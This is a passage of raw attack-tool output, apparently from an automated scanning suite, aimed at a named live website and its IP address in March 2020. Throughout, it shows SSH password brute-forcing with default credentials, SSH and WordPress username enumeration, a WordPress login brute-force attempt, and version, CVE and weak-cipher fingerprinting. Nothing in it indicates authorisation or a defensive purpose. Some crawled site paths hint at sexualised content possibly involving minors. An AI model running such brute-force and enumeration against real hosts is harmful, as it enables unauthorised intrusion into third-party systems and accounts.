1992NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: webadmin:ashley
1993NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: sysadmin:ashley
1994NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: netadmin:ashley
1995NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: guest:ashley
1996NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: user:ashley
1997NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: web:ashley
1998NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: test:ashley
1999NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: root:000000
2000NSE: [ssh-brute 213.183.63.253:22] Trying username/password pair: admin:000000
2001Completed NSE at 18:20, 90.48s elapsed
2002Initiating NSE at 18:20
2003Completed NSE at 18:20, 0.05s elapsed
2004Nmap scan report for models-fashion.net (213.183.63.253)
2005Host is up (0.14s latency).
2006rDNS record for 213.183.63.253: vm201114.melbi.space
2007
2008PORT STATE SERVICE VERSION
200922/tcp open ssh OpenSSH 7.4 (protocol 2.0)
2010| ssh-auth-methods:
2011| Supported authentication methods:
2012| publickey
2013| gssapi-keyex
2014| gssapi-with-mic
2015|_ password
2016| ssh-hostkey:
2017| 2048 da:20:da:dc:dc:03:2f:f4:fb:d3:39:f7:37:7b:e6:80 (RSA)
2018| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDSyQw9qz9UcMr6Vr8hkYpCCqdWKunOBN3Uzqn6ab4ZNFnaFpFlNYn7VHt8TVlp9XB36lHHDxQ1zfKYv00UpnfhRZg2PWbyeZZj1MLmBCbL30nEBpcTay8rHYkyFBuOhbyuOOSxcmG96e313H9LmSworFhEuwboKhf6XaJ40UAjLT/Um/KapsQ+DvoyUTa+cFO7jRsa8kSHwFNGyD37MjYORD1XfEM2IJe2bjgE+/ihd+ibqY/y8G8zg4Lf9F68JlGbBufqoB3+Hbbw/Sk4Nxe/kdfGU7LOYnep/tsmpMvqbyWdCbthoocTJsVSmPgw6ky5yJO1hd63ODOoN3j0NcID
2019| 256 a3:35:91:92:60:07:1b:af:a5:b6:e5:46:a0:59:bc:c0 (ECDSA)
2020| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAVdlp1+DOxgy4jmMnhdeacmdRvEu4S7CK0Fuz9Scmrqzxk4TxAToG34l1u+XBqXJoVFYd+if58nv3uVyILV658=
2021| 256 15:41:a5:a8:39:b9:62:a4:b9:93:28:ff:67:5f:b8:32 (ED25519)
2022|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKKuQuS31A6SBCa048NIFDjhP9G0TI9ra+N1axXAwdpS
2023| ssh-publickey-acceptance:
2024|_ Accepted Public Keys: No public keys accepted
2025|_ssh-run: Failed to specify credentials and command to run.
2026| vulners:
2027| cpe:/a:openbsd:openssh:7.4:
2028| CVE-2018-15919 5.0 https://vulners.com/cve/CVE-2018-15919
2029|_ CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
2030Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
2031Aggressive OS guesses: Linux 3.10 - 4.11 (95%), Linux 3.2 - 4.9 (95%), Linux 3.16 (95%), Linux 3.18 (94%), ASUS RT-N56U WAP (Linux 3.4) (94%), Linux 3.1 (92%), Linux 3.2 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 - 3.16 (92%)
2032No exact OS matches for host (test conditions non-ideal).
2033Uptime guess: 27.001 days (since Wed Mar 4 17:18:31 2020)
2034Network Distance: 8 hops
2035TCP Sequence Prediction: Difficulty=258 (Good luck!)
2036IP ID Sequence Generation: All zeros
2037
2038TRACEROUTE (using port 22/tcp)
2039HOP RTT ADDRESS
20401 104.50 ms 10.203.14.1
20412 104.55 ms 45.131.5.2
20423 104.75 ms 109.236.95.224
20434 105.56 ms 109.236.95.167
20445 108.39 ms 195.22.213.126
20456 162.63 ms ae10.sofia1.sof.seabone.net (195.22.211.209)
20467 137.46 ms melbikomas.sofia1.sof.seabone.net (89.221.39.27)
20478 132.00 ms vm201114.melbi.space (213.183.63.253)
2048
2049NSE: Script Post-scanning.
2050Initiating NSE at 18:20
2051Completed NSE at 18:20, 0.00s elapsed
2052Initiating NSE at 18:20
2053Completed NSE at 18:20, 0.00s elapsed
2054######################################################################################################################
2055USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
2056RHOSTS => models-fashion.net
2057RHOST => models-fashion.net
2058[*] 213.183.63.253:22 - SSH - Using malformed packet technique
2059[*] 213.183.63.253:22 - SSH - Starting scan
2060[+] 213.183.63.253:22 - SSH - User 'admin' found
2061[+] 213.183.63.253:22 - SSH - User 'administrator' found
2062[+] 213.183.63.253:22 - SSH - User 'anonymous' found
2063[+] 213.183.63.253:22 - SSH - User 'backup' found
2064[+] 213.183.63.253:22 - SSH - User 'bee' found
2065[+] 213.183.63.253:22 - SSH - User 'ftp' found
2066[+] 213.183.63.253:22 - SSH - User 'guest' found
2067[+] 213.183.63.253:22 - SSH - User 'GUEST' found
2068[+] 213.183.63.253:22 - SSH - User 'info' found
2069[+] 213.183.63.253:22 - SSH - User 'mail' found
2070[+] 213.183.63.253:22 - SSH - User 'mailadmin' found
2071[+] 213.183.63.253:22 - SSH - User 'msfadmin' found
2072[+] 213.183.63.253:22 - SSH - User 'mysql' found
2073[+] 213.183.63.253:22 - SSH - User 'nobody' found
2074[+] 213.183.63.253:22 - SSH - User 'oracle' found
2075[+] 213.183.63.253:22 - SSH - User 'owaspbwa' found
2076[+] 213.183.63.253:22 - SSH - User 'postfix' found
2077[+] 213.183.63.253:22 - SSH - User 'postgres' found
2078[+] 213.183.63.253:22 - SSH - User 'private' found
2079[+] 213.183.63.253:22 - SSH - User 'proftpd' found
2080[+] 213.183.63.253:22 - SSH - User 'public' found
2081[+] 213.183.63.253:22 - SSH - User 'root' found
2082[+] 213.183.63.253:22 - SSH - User 'superadmin' found
2083[+] 213.183.63.253:22 - SSH - User 'support' found
2084[+] 213.183.63.253:22 - SSH - User 'sys' found
2085[+] 213.183.63.253:22 - SSH - User 'system' found
2086[+] 213.183.63.253:22 - SSH - User 'systemadmin' found
2087[+] 213.183.63.253:22 - SSH - User 'systemadministrator' found
2088[+] 213.183.63.253:22 - SSH - User 'test' found
2089[+] 213.183.63.253:22 - SSH - User 'tomcat' found
2090[+] 213.183.63.253:22 - SSH - User 'user' found
2091[+] 213.183.63.253:22 - SSH - User 'webmaster' found
2092[+] 213.183.63.253:22 - SSH - User 'www-data' found
2093[+] 213.183.63.253:22 - SSH - User 'Fortimanager_Access' found
2094[*] Scanned 1 of 1 hosts (100% complete)
2095[*] Auxiliary module execution completed
2096######################################################################################################################
2097
2098wig - WebApp Information Gatherer
2099
2100
2101Scanning http://models-fashion.net...
2102_________________________________________ SITE INFO __________________________________________
2103IP Title
2104213.183.63.253 502 Bad Gateway
2105
2106__________________________________________ VERSION ___________________________________________
2107Name Versions Type
2108Roundcube CMS
2109WordPress 4.5.9 CMS
2110Apache 2.4.10 | 2.4.11 | 2.4.12 | 2.4.5 | 2.4.6 | 2.4.7 | 2.4.8 Platform
2111 2.4.9
2112PHP 5.4.45 Platform
2113nginx 1.16.1 Platform
2114FreeBSD 10 | 11 OS
2115OpenBSD 5.9 OS
2116
2117________________________________________ INTERESTING _________________________________________
2118URL Note Type
2119/wp-login.php Wordpress login page Interesting
2120/readme.html Wordpress readme Interesting
2121/readme.html Readme file Interesting
2122/robots.txt robots.txt index Interesting
2123/login/ Login Page Interesting
2124
2125___________________________________________ TOOLS ____________________________________________
2126Name Link Software
2127wpscan https://github.com/wpscanteam/wpscan WordPress
2128CMSmap https://github.com/Dionach/CMSmap WordPress
2129
2130______________________________________________________________________________________________
2131Time: 186.4 sec Urls: 435 Fingerprints: 40401
2132######################################################################################################################
2133Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-31 18:30 EDT
2134NSE: Loaded 161 scripts for scanning.
2135NSE: Script Pre-scanning.
2136Initiating NSE at 18:30
2137Completed NSE at 18:30, 0.00s elapsed
2138Initiating NSE at 18:30
2139Completed NSE at 18:30, 0.00s elapsed
2140Initiating Parallel DNS resolution of 1 host. at 18:30
2141Completed Parallel DNS resolution of 1 host. at 18:30, 0.02s elapsed
2142Initiating SYN Stealth Scan at 18:30
2143Scanning models-fashion.net (213.183.63.253) [1 port]
2144Discovered open port 80/tcp on 213.183.63.253
2145Completed SYN Stealth Scan at 18:30, 0.19s elapsed (1 total ports)
2146Initiating Service scan at 18:30
2147Scanning 1 service on models-fashion.net (213.183.63.253)
2148Completed Service scan at 18:30, 6.39s elapsed (1 service on 1 host)
2149Initiating OS detection (try #1) against models-fashion.net (213.183.63.253)
2150Retrying OS detection (try #2) against models-fashion.net (213.183.63.253)
2151Initiating Traceroute at 18:30
2152Completed Traceroute at 18:30, 0.67s elapsed
2153Initiating Parallel DNS resolution of 8 hosts. at 18:30
2154Completed Parallel DNS resolution of 8 hosts. at 18:30, 16.50s elapsed
2155NSE: Script scanning 213.183.63.253.
2156Initiating NSE at 18:30
2157Completed NSE at 18:32, 90.85s elapsed
2158Initiating NSE at 18:32
2159Completed NSE at 18:32, 1.12s elapsed
2160Nmap scan report for models-fashion.net (213.183.63.253)
2161Host is up (0.14s latency).
2162rDNS record for 213.183.63.253: vm201114.melbi.space
2163
2164PORT STATE SERVICE VERSION
216580/tcp open http nginx 1.16.1
2166| http-brute:
2167|_ Path "/" does not require authentication
2168|_http-chrono: Request times for /; avg: 2966.57ms; min: 2401.47ms; max: 3803.16ms
2169| http-cookie-flags:
2170| /:
2171| PHPSESSID:
2172|_ httponly flag not set
2173| http-csrf:
2174| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=models-fashion.net
2175| Found the following possible CSRF vulnerabilities:
2176|
2177| Path: http://models-fashion.net:80/
2178| Form id:
2179| Form action: http://models-fashion.net/
2180|
2181| Path: http://models-fashion.net:80/
2182| Form id:
2183| Form action: http://models-fashion.net/
2184|
2185| Path: http://models-fashion.net:80/category/art-modeling/
2186| Form id:
2187| Form action: http://models-fashion.net/
2188|
2189| Path: http://models-fashion.net:80/category/art-modeling/
2190| Form id:
2191| Form action: http://models-fashion.net/
2192|
2193| Path: http://models-fashion.net:80/category/silver-jewels/
2194| Form id:
2195| Form action: http://models-fashion.net/
2196|
2197| Path: http://models-fashion.net:80/category/silver-jewels/
2198| Form id:
2199| Form action: http://models-fashion.net/
2200|
2201| Path: http://models-fashion.net:80/tag/silver-starlets/
2202| Form id:
2203| Form action: http://models-fashion.net/
2204|
2205| Path: http://models-fashion.net:80/tag/silver-starlets/
2206| Form id:
2207| Form action: http://models-fashion.net/
2208|
2209| Path: http://models-fashion.net:80/category/candydoll/
2210| Form id:
2211| Form action: http://models-fashion.net/
2212|
2213| Path: http://models-fashion.net:80/category/candydoll/
2214| Form id:
2215| Form action: http://models-fashion.net/
2216|
2217| Path: http://models-fashion.net:80/tag/anita-model/
2218| Form id:
2219| Form action: http://models-fashion.net/
2220|
2221| Path: http://models-fashion.net:80/tag/anita-model/
2222| Form id:
2223| Form action: http://models-fashion.net/
2224|
2225| Path: http://models-fashion.net:80/tag/mayr/
2226| Form id:
2227| Form action: http://models-fashion.net/
2228|
2229| Path: http://models-fashion.net:80/tag/mayr/
2230| Form id:
2231| Form action: http://models-fashion.net/
2232|
2233| Path: http://models-fashion.net:80/tag/evie-model/
2234| Form id:
2235| Form action: http://models-fashion.net/
2236|
2237| Path: http://models-fashion.net:80/tag/evie-model/
2238| Form id:
2239| Form action: http://models-fashion.net/
2240|
2241| Path: http://models-fashion.net:80/tag/silver-alissa/
2242| Form id:
2243| Form action: http://models-fashion.net/
2244|
2245| Path: http://models-fashion.net:80/tag/silver-alissa/
2246| Form id:
2247| Form action: http://models-fashion.net/
2248|
2249| Path: http://models-fashion.net:80/category/polska-models/
2250| Form id:
2251| Form action: http://models-fashion.net/
2252|
2253| Path: http://models-fashion.net:80/category/polska-models/
2254| Form id:
2255| Form action: http://models-fashion.net/
2256|
2257| Path: http://models-fashion.net:80/tag/vladmodels/
2258| Form id:
2259| Form action: http://models-fashion.net/
2260|
2261| Path: http://models-fashion.net:80/tag/vladmodels/
2262| Form id:
2263| Form action: http://models-fashion.net/
2264|
2265| Path: http://models-fashion.net:80/tag/cg-models/
2266| Form id:
2267| Form action: http://models-fashion.net/
2268|
2269| Path: http://models-fashion.net:80/tag/cg-models/
2270| Form id:
2271| Form action: http://models-fashion.net/
2272|
2273| Path: http://models-fashion.net:80/category/russian-models/
2274| Form id:
2275| Form action: http://models-fashion.net/
2276|
2277| Path: http://models-fashion.net:80/category/russian-models/
2278| Form id:
2279| Form action: http://models-fashion.net/
2280|
2281| Path: http://models-fashion.net:80/lara-model/
2282| Form id:
2283| Form action: http://models-fashion.net/
2284|
2285| Path: http://models-fashion.net:80/lara-model/
2286| Form id: commentform
2287| Form action: http://models-fashion.net/wp-comments-post.php
2288|
2289| Path: http://models-fashion.net:80/lara-model/
2290| Form id:
2291| Form action: http://models-fashion.net/
2292|
2293| Path: http://models-fashion.net:80/category/usenet/
2294| Form id:
2295| Form action: http://models-fashion.net/
2296|
2297| Path: http://models-fashion.net:80/category/usenet/
2298| Form id:
2299| Form action: http://models-fashion.net/
2300|
2301| Path: http://models-fashion.net:80/category/teen-video-2/
2302| Form id:
2303| Form action: http://models-fashion.net/
2304|
2305| Path: http://models-fashion.net:80/category/teen-video-2/
2306| Form id:
2307| Form action: http://models-fashion.net/
2308|
2309| Path: http://models-fashion.net:80/tag/mashap/
2310| Form id:
2311| Form action: http://models-fashion.net/
2312|
2313| Path: http://models-fashion.net:80/tag/mashap/
2314| Form id:
2315| Form action: http://models-fashion.net/
2316|
2317| Path: http://models-fashion.net:80/category/pr-models/
2318| Form id:
2319| Form action: http://models-fashion.net/
2320|
2321| Path: http://models-fashion.net:80/category/pr-models/
2322| Form id:
2323| Form action: http://models-fashion.net/
2324|
2325| Path: http://models-fashion.net:80/tag/nadyas/
2326| Form id:
2327| Form action: http://models-fashion.net/
2328|
2329| Path: http://models-fashion.net:80/tag/nadyas/
2330| Form id:
2331| Form action: http://models-fashion.net/
2332|
2333| Path: http://models-fashion.net:80/tag/a-little-agency/
2334| Form id:
2335| Form action: http://models-fashion.net/
2336|
2337| Path: http://models-fashion.net:80/tag/a-little-agency/
2338| Form id:
2339|_ Form action: http://models-fashion.net/
2340|_http-date: Tue, 31 Mar 2020 22:30:34 GMT; -6s from local time.
2341|_http-devframework: Wordpress detected. Found common traces on /
2342|_http-dombased-xss: Couldn't find any DOM based XSS.
2343|_http-feed: ERROR: Script execution failed (use -d to debug)
2344|_http-fetch: Please enter the complete path of the directory to save data in.
2345|_http-generator: WordPress 4.5.9
2346| http-headers:
2347| Server: nginx/1.16.1
2348| Date: Tue, 31 Mar 2020 22:30:48 GMT
2349| Content-Type: text/html; charset=UTF-8
2350| Connection: close
2351| Upgrade: h2,h2c
2352| X-Powered-By: PHP/5.4.45
2353| Set-Cookie: PHPSESSID=kv0018mu6v2nmgb683a77fcc14; path=/
2354| Expires: Thu, 19 Nov 1981 08:52:00 GMT
2355| Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
2356| Pragma: no-cache
2357| Link: <http://models-fashion.net/wp-json/>; rel="https://api.w.org/"
2358| Vary: User-Agent
2359|
2360|_ (Request type: HEAD)
2361| http-methods:
2362| Supported Methods: GET HEAD POST
2363|_ Potentially risky methods:
2364|_http-mobileversion-checker: No mobile version detected.
2365|_http-passwd: ERROR: Script execution failed (use -d to debug)
2366| http-php-version: Versions from logo query (less accurate): 5.3.0 - 5.3.29, 5.4.0 - 5.4.45
2367| Versions from credits query (more accurate): 5.4.15 - 5.4.45
2368|_Version from header x-powered-by: PHP/5.4.45
2369| http-robots.txt: 1 disallowed entry
2370|_/wp-admin/
2371| http-security-headers:
2372| Cache_Control:
2373| Header: Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
2374| Pragma:
2375| Header: Pragma: no-cache
2376| Expires:
2377|_ Header: Expires: Thu, 19 Nov 1981 08:52:00 GMT
2378|_http-server-header: nginx/1.16.1
2379| http-sitemap-generator:
2380| Directory structure:
2381| /
2382| Other: 1
2383| /category/art-modeling/
2384| Other: 1
2385| /category/candydoll/
2386| Other: 1
2387| /category/polska-models/
2388| Other: 1
2389| /category/pr-models/
2390| Other: 1
2391| /category/russian-models/
2392| Other: 1
2393| /category/silver-jewels/
2394| Other: 1
2395| /category/teen-video-2/
2396| Other: 1
2397| /category/usenet/
2398| Other: 1
2399| /lara-model/
2400| Other: 1
2401| /tag/a-little-agency/
2402| Other: 1
2403| /tag/anita-model/
2404| Other: 1
2405| /tag/cg-models/
2406| Other: 1
2407| /tag/mashap/
2408| Other: 1
2409| /tag/mayr/
2410| Other: 1
2411| /tag/nadyas/
2412| Other: 1
2413| /tag/pr-models/
2414| Other: 1
2415| /tag/silver-alissa/
2416| Other: 1
2417| /tag/silver-starlets/
2418| Other: 1
2419| /tag/vladmodels/
2420| Other: 1
2421| Longest directory structure:
2422| Depth: 2
2423| Dir: /category/art-modeling/
2424| Total files found (by extension):
2425|_ Other: 20
2426|_http-title: FASHION MODELS | You have reached the website of the Most Beau...
2427| http-vhosts:
2428|_127 names had status 200
2429| http-wordpress-brute:
2430| Accounts: No valid accounts found
2431| Statistics: Performed 0 guesses in 1 seconds, average tps: 0.0
2432|_ ERROR: The service seems to have failed or is heavily firewalled...
2433| http-wordpress-users:
2434| Username found: admin
2435|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
2436|_http-xssed: No previously reported XSS vuln.
2437Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
2438Aggressive OS guesses: Linux 3.10 - 4.11 (95%), Linux 3.2 - 4.9 (95%), Linux 3.16 (95%), Linux 3.18 (94%), ASUS RT-N56U WAP (Linux 3.4) (94%), Oracle VM Server 3.4.2 (Linux 4.1) (92%), Linux 3.1 (92%), Linux 3.2 (92%), Linux 3.12 (92%), Linux 3.13 (92%)
2439No exact OS matches for host (test conditions non-ideal).
2440Uptime guess: 27.009 days (since Wed Mar 4 17:18:31 2020)
2441Network Distance: 8 hops
2442TCP Sequence Prediction: Difficulty=264 (Good luck!)
2443IP ID Sequence Generation: All zeros
2444
2445TRACEROUTE (using port 80/tcp)
2446HOP RTT ADDRESS
24471 105.77 ms 10.203.14.1
24482 657.69 ms 45.131.5.2
24493 105.85 ms 109.236.95.224
24504 106.17 ms 109.236.95.167
24515 106.31 ms 195.22.213.126
24526 155.49 ms ae11.sofia1.sof.seabone.net (195.22.211.211)
24537 140.65 ms 89.221.39.27
24548 132.34 ms vm201114.melbi.space (213.183.63.253)
2455
2456NSE: Script Post-scanning.
2457Initiating NSE at 18:32
2458Completed NSE at 18:32, 0.00s elapsed
2459Initiating NSE at 18:32
2460Completed NSE at 18:32, 0.00s elapsed
2461#####################################################################################################################
2462Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-31 18:12 EDT
2463Nmap scan report for vm201114.melbi.space (213.183.63.253)
2464Host is up (0.14s latency).
2465Not shown: 468 closed ports, 6 filtered ports
2466Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
2467PORT STATE SERVICE VERSION
246822/tcp open ssh OpenSSH 7.4 (protocol 2.0)
2469| ssh-hostkey:
2470| 2048 da:20:da:dc:dc:03:2f:f4:fb:d3:39:f7:37:7b:e6:80 (RSA)
2471| 256 a3:35:91:92:60:07:1b:af:a5:b6:e5:46:a0:59:bc:c0 (ECDSA)
2472|_ 256 15:41:a5:a8:39:b9:62:a4:b9:93:28:ff:67:5f:b8:32 (ED25519)
247380/tcp open http nginx 1.16.1
2474|_http-server-header: nginx/1.16.1
2475|_http-title: Shared IP
2476Aggressive OS guesses: Linux 3.10 - 4.11 (95%), Linux 3.2 - 4.9 (93%), Linux 3.13 or 4.2 (92%), Linux 4.10 (92%), Linux 4.2 (92%), Linux 4.4 (92%), Asus RT-AC66U WAP (92%), Linux 3.11 - 3.12 (92%), Linux 3.18 (92%), Linux 3.2 (92%)
2477No exact OS matches for host (test conditions non-ideal).
2478Network Distance: 8 hops
2479
2480TRACEROUTE (using port 80/tcp)
2481HOP RTT ADDRESS
24821 104.54 ms 10.203.14.1
24832 104.63 ms 45.131.5.3
24843 104.61 ms 109.236.95.228
24854 105.52 ms 109.236.95.173
24865 106.15 ms 195.22.213.126
24876 160.95 ms ae11.sofia1.sof.seabone.net (195.22.211.211)
24887 136.56 ms melbikomas.sofia1.sof.seabone.net (89.221.39.27)
24898 131.98 ms vm201114.melbi.space (213.183.63.253)
2490######################################################################################################################
2491Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-31 18:12 EDT
2492Warning: 213.183.63.253 giving up on port because retransmission cap hit (2).
2493Nmap scan report for vm201114.melbi.space (213.183.63.253)
2494Host is up (0.14s latency).
2495Not shown: 19 closed ports, 3 filtered ports
2496Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
2497PORT STATE SERVICE VERSION
249868/udp open|filtered dhcpc
2499137/udp open|filtered netbios-ns
2500138/udp open|filtered netbios-dgm
2501139/udp open|filtered netbios-ssn
2502389/udp open|filtered ldap
25032049/udp open|filtered nfs
2504Too many fingerprints match this host to give specific OS details
2505Network Distance: 8 hops
2506
2507TRACEROUTE (using port 67/udp)
2508HOP RTT ADDRESS
25091 103.94 ms 10.203.14.1
25102 104.25 ms 45.131.5.3
25113 104.21 ms 109.236.95.224
25124 101.12 ms 109.236.95.173
25135 101.43 ms 195.22.213.126
25146 162.43 ms ae10.sofia1.sof.seabone.net (195.22.211.209)
25157 139.53 ms melbikomas.sofia1.sof.seabone.net (89.221.39.27)
25168 139.52 ms vm201114.melbi.space (213.183.63.253)
2517######################################################################################################################
2518# general
2519(gen) banner: SSH-2.0-OpenSSH_7.4
2520(gen) software: OpenSSH 7.4
2521(gen) compatibility: OpenSSH 7.3+ (some functionality from 6.6), Dropbear SSH 2016.73+ (some functionality from 0.52)
2522(gen) compression: enabled (zlib@openssh.com)
2523
2524# key exchange algorithms
2525(kex) curve25519-sha256 -- [warn] unknown algorithm
2526(kex) curve25519-sha256@libssh.org -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62
2527(kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves
2528 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
2529(kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves
2530 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
2531(kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves
2532 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
2533(kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
2534 `- [info] available since OpenSSH 4.4
2535(kex) diffie-hellman-group16-sha512 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
2536(kex) diffie-hellman-group18-sha512 -- [info] available since OpenSSH 7.3
2537(kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2538 `- [warn] using weak hashing algorithm
2539 `- [info] available since OpenSSH 2.3.0
2540(kex) diffie-hellman-group14-sha256 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
2541(kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
2542 `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
2543(kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2544 `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
2545 `- [warn] using small 1024-bit modulus
2546 `- [warn] using weak hashing algorithm
2547 `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
2548
2549# host-key algorithms
2550(key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
2551(key) rsa-sha2-512 -- [info] available since OpenSSH 7.2
2552(key) rsa-sha2-256 -- [info] available since OpenSSH 7.2
2553(key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves
2554 `- [warn] using weak random number generator could reveal the key
2555 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
2556(key) ssh-ed25519 -- [info] available since OpenSSH 6.5
2557
2558# encryption algorithms (ciphers)
2559(enc) chacha20-poly1305@openssh.com -- [info] available since OpenSSH 6.5
2560 `- [info] default cipher since OpenSSH 6.9.
2561(enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
2562(enc) aes192-ctr -- [info] available since OpenSSH 3.7
2563(enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
2564(enc) aes128-gcm@openssh.com -- [info] available since OpenSSH 6.2
2565(enc) aes256-gcm@openssh.com -- [info] available since OpenSSH 6.2
2566(enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2567 `- [warn] using weak cipher mode
2568 `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
2569(enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2570 `- [warn] using weak cipher mode
2571 `- [info] available since OpenSSH 2.3.0
2572(enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2573 `- [warn] using weak cipher mode
2574 `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
2575(enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2576 `- [fail] disabled since Dropbear SSH 0.53
2577 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2578 `- [warn] using weak cipher mode
2579 `- [warn] using small 64-bit block size
2580 `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
2581(enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2582 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2583 `- [warn] using weak cipher mode
2584 `- [warn] using small 64-bit block size
2585 `- [info] available since OpenSSH 2.1.0
2586(enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2587 `- [warn] using weak cipher
2588 `- [warn] using weak cipher mode
2589 `- [warn] using small 64-bit block size
2590 `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
2591
2592# message authentication code algorithms
2593(mac) umac-64-etm@openssh.com -- [warn] using small 64-bit tag size
2594 `- [info] available since OpenSSH 6.2
2595(mac) umac-128-etm@openssh.com -- [info] available since OpenSSH 6.2
2596(mac) hmac-sha2-256-etm@openssh.com -- [info] available since OpenSSH 6.2
2597(mac) hmac-sha2-512-etm@openssh.com -- [info] available since OpenSSH 6.2
2598(mac) hmac-sha1-etm@openssh.com -- [warn] using weak hashing algorithm
2599 `- [info] available since OpenSSH 6.2
2600(mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
2601 `- [warn] using small 64-bit tag size
2602 `- [info] available since OpenSSH 4.7
2603(mac) umac-128@openssh.com -- [warn] using encrypt-and-MAC mode
2604 `- [info] available since OpenSSH 6.2
2605(mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
2606 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
2607(mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
2608 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
2609(mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
2610 `- [warn] using weak hashing algorithm
2611 `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
2612
2613# algorithm recommendations (for OpenSSH 7.4)
2614(rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
2615(rec) -ecdh-sha2-nistp256 -- kex algorithm to remove
2616(rec) -diffie-hellman-group-exchange-sha256 -- kex algorithm to remove
2617(rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
2618(rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
2619(rec) -ecdh-sha2-nistp521 -- kex algorithm to remove
2620(rec) -ecdh-sha2-nistp384 -- kex algorithm to remove
2621(rec) -ecdsa-sha2-nistp256 -- key algorithm to remove
2622(rec) -blowfish-cbc -- enc algorithm to remove
2623(rec) -3des-cbc -- enc algorithm to remove
2624(rec) -aes256-cbc -- enc algorithm to remove
2625(rec) -cast128-cbc -- enc algorithm to remove
2626(rec) -aes192-cbc -- enc algorithm to remove
2627(rec) -aes128-cbc -- enc algorithm to remove
2628(rec) -hmac-sha2-512 -- mac algorithm to remove
2629(rec) -umac-128@openssh.com -- mac algorithm to remove
2630(rec) -hmac-sha2-256 -- mac algorithm to remove
2631(rec) -umac-64@openssh.com -- mac algorithm to remove
2632(rec) -hmac-sha1 -- mac algorithm to remove
2633(rec) -hmac-sha1-etm@openssh.com -- mac algorithm to remove
2634(rec) -umac-64-etm@openssh.com -- mac algorithm to remove
2635######################################################################################################################
2636Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-31 18:15 EDT
2637NSE: [ssh-run] Failed to specify credentials and command to run.
2638NSE: [ssh-brute] Trying username/password pair: root:root
2639NSE: [ssh-brute] Trying username/password pair: admin:admin
2640NSE: [ssh-brute] Trying username/password pair: administrator:administrator
2641NSE: [ssh-brute] Trying username/password pair: webadmin:webadmin
2642NSE: [ssh-brute] Trying username/password pair: sysadmin:sysadmin
2643NSE: [ssh-brute] Trying username/password pair: netadmin:netadmin
2644NSE: [ssh-brute] Trying username/password pair: guest:guest
2645NSE: [ssh-brute] Trying username/password pair: user:user
2646NSE: [ssh-brute] Trying username/password pair: web:web
2647NSE: [ssh-brute] Trying username/password pair: test:test
2648NSE: [ssh-brute] Trying username/password pair: root:
